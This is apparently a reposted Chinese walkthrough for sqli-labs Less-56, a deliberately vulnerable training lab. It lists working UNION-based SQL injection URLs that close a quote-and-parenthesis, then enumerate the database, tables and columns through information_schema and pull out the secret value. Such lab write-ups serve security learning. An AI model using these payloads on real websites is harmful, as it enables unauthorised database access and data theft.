【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型 挑战 联合查询 只允许14次查询 变化3)

单引号括号闭合

http://192.168.136.128/sqli-labs-master/Less-56/?id=1')%23

http://192.168.136.128/sqli-labs-master/Less-56/?id=0') union  select 1,2,database()%23

 

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='58ONMY4BZG'%23

 

http://192.168.136.128/sqli-labs-master/Less-56/index.php?id=0') union select 1,secret_HD4U,3 from 58ONMY4BZG limit 0,1%23

 

 

原文地址:https://www.cnblogs.com/omnis/p/8393602.html